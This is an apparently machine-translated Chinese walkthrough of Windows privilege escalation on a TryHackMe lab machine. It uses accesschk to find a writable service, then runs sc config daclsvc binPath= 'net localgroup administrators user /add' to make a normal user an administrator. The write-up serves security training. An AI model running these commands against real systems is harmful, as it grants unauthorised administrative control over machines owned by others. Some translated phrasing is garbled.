使用 binPath 提升 Windows 權限

binPath 是一個必需的服務參數，用于指定服務二進制文件的路徑。如果任何服務配置了不正确的權限并提供對服務配置的未經授權的訪問，攻擊者可以利用此錯誤配置并通過binPath參數執行任意命令。

如果服務配置為以提升的權限運行，攻擊者可以在以普通用戶身份登錄時以管理權限執行任意命令。

攻擊背後的想法是識别以系統或管理權限運行的服務，并使用錯誤的權限來配置服務并通過binPath參數執行任意命令。

Windows 特權升降架

在演示中，我将使用 TryHackMe 中的一個易受攻擊的機器，名為Windows PrivEsc Arena。

·黑客機器IP - 10.10.249.6

·受害者機器的IP地址是10.10.140.212

·具有權限的用戶 -用戶

初始訪問

因此，我們可以使用普通用戶user的權限進行訪問。我們需要通過将用戶用戶添加到管理員組來提升權限。

具有用戶權限的受害計算機

我們看到隻有TCM用戶是 Administrators 組的成員。

管理員組服務

第一步是為服務定義弱權限。我們可以使用Accesschk工具來查找可以修改的服務

accesschk64.exe –wvcu Everyone *

(Shows all the services that has write access to Everyone)

-u = Suppress Errors-w = Show only objects that has write access

-v = Verbose

-c = Name as a windows service ( * for all the services)

daclsvc服務将SERVICE_CHANGE_CONFIG權限設置為每個人。

我們可以使用以下命令查詢服務以獲取更多信息：

accesschk64.exe –wvcu daclsvc

sc qc daclsvc

在上面的屏幕截圖中，您可以看到daclsvc服務正在以系統權限運行。讓我們嘗試使用錯誤的配置将用戶用戶添加到管理員組。

開發

使用以下命令更改daclsvc服務的 binPath參數：

sc config daclsvc binPath=“net localgroup administrators user /add”

我們看到命令執行成功。讓我們檢查binPath參數：

sc qc daclsvc

重新啟動服務後，用戶user将被添加到管理員組中。

結論

我向您展示了如何使用 binPath 參數在 Windows 上提升權限。為了防止攻擊，您必須防止未經授權的管理員對服務進行更改。

更多精彩资讯请关注tft每日頭條，我们将持续为您更新最新资讯!